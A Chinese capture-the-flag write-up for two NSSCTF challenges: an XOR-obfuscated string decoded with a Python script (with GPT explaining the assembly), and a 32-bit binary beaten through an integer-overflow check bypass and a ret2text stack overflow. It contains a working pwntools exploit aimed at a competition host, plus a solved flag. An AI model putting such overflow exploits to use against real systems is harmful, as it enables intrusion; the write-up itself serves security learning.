没有附件,nc直接连接
给了一段汇编代码,让gpt翻译一下
这段汇编代码是一个循环,它对存储在ebp+i位置的字符串进行处理。让我逐步解释一下每个指令的作用:
mov eax, [ebp+i]: 将ebp+i位置的值加载到eax寄存器中。
add eax, 1: 将eax寄存器中的值加1。
mov [ebp+i], eax: 将eax寄存器中的值存储回ebp+i位置。
mov ecx, [ebp+Str]: 将ebp+Str位置的值加载到ecx寄存器中,这里假设Str是一个指向字符串的指针。
push ecx: 将ecx寄存器中的值压入栈中,准备调用函数。
call _strlen: 调用名为_strlent的函数,用于计算字符串的长度。
add esp, 4: 调整栈指针,恢复栈的平衡。
cmp [ebp+i], eax: 将ebp+i位置的值与eax寄存器中的值进行比较。
jge short loc_40119D: 如果比较结果大于等于,则跳转到loc_40119D处,否则继续执行下一条指令。
mov edx, [ebp+Str]: 将ebp+Str位置的值加载到edx寄存器中。
add edx, [ebp+i]: 将ebp+i位置的值加到edx寄存器中,得到字符串中的偏移量。
movsx eax, byte ptr [edx]: 将edx寄存器指向的字节加载到eax寄存器中,并进行符号扩展。
xor eax, 10h: 将eax寄存器中的值与10h进行异或操作。
mov ecx, [ebp+Str]: 将ebp+Str位置的值加载到ecx寄存器中。
add ecx, [ebp+i]: 将ebp+i位置的值加到ecx寄存器中,得到字符串中的偏移量。
mov [ecx], al: 将al寄存器中的值存储到ecx寄存器指向的位置。
jmp short loc_40116D: 无条件跳转到loc_40116D处,即循环的开始。
根据你提供的结果,这段汇编代码对字符串进行了异或操作,并将结果存储回原字符串中。你的结果是一个经过异或处理的字符串。
实际就是把字符串异或了一下,写个脚本异或回去
data = [0x44, 0x7c, 0x5e, 0x44, 0x41, 0x21, 0x42, 0x57, 0x75, 0x21, 0x74, 0x56, 0x44, 0x57, 0x5d, 0x67, 0x44, 0x46, 0x29, 0x45, 0x5d, 0x56, 0x29, 0x67, 0x46, 0x22, 0x25, 0x76, 0x74, 0x6a, 0x52, 0x69, 0x5d, 0x47, 0x41, 0x78, 0x76, 0x41, 0x2d, 0x2d]
key = 0x10
original_data = []
for byte in data:
original_byte = byte ^ key
original_data.append(original_byte)
original_string = ''.join(chr(byte) for byte in original_data)
print(original_string)
得到base64编码
TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==
CyberChef转码
?但这个不是flag哦,我们把这个输入到程序
输入之后ls,cat?flag即可?
NSSCTF{ae034760-adc0-4f3d-92d2-0ab3b91143ac}
下载附件,拖入kali中,使用file指令
32位程序 ,接着checksec,检查保护
32位IDA打开,分析read函数这里有栈溢出,但是前面有个if卡着
?这个if要求你的输入小于0,并且输入的数的负数也小于0,一般的数字肯定不行,我们看一下类型
是int,可以采用整数溢出,也就是输入超出范围的数
在C语言中,最小的?int
?值是?-2147483648
(即?-2^31
),当我们取这个数的相反数时,由于?int
?的最大值是?2147483647
(即?2^31 - 1
),所以无法表示出来,导致整数溢出,取反后的值仍然是?-2147483648
。所以,为了满足?if
?语句的条件,你需要输入?-2147483648
。
?发现有后门函数
地址0x8049328
解题思路:
-2147483648,使其进入if
写脚本
from pwn import * #调用pwntools
p=remote('node7.anna.nssctf.cn',28822) #链接远程
backdoor = 0x8049328 #后门函数地址
payload = b'a' *(0x20+0x4) + p32(backdoor) #构造playload
p.sendlineafter('Easy ret2text!!!Input:','-2147483648') #先发送个-2147483648过去,使其进入if
p.recvline() #接收一下回显,只是让right这一句正常输出,让程序正确执行
p.sendline(payload) #发送攻击负载,让栈溢出,并执行后门函数
p.interactive() #交互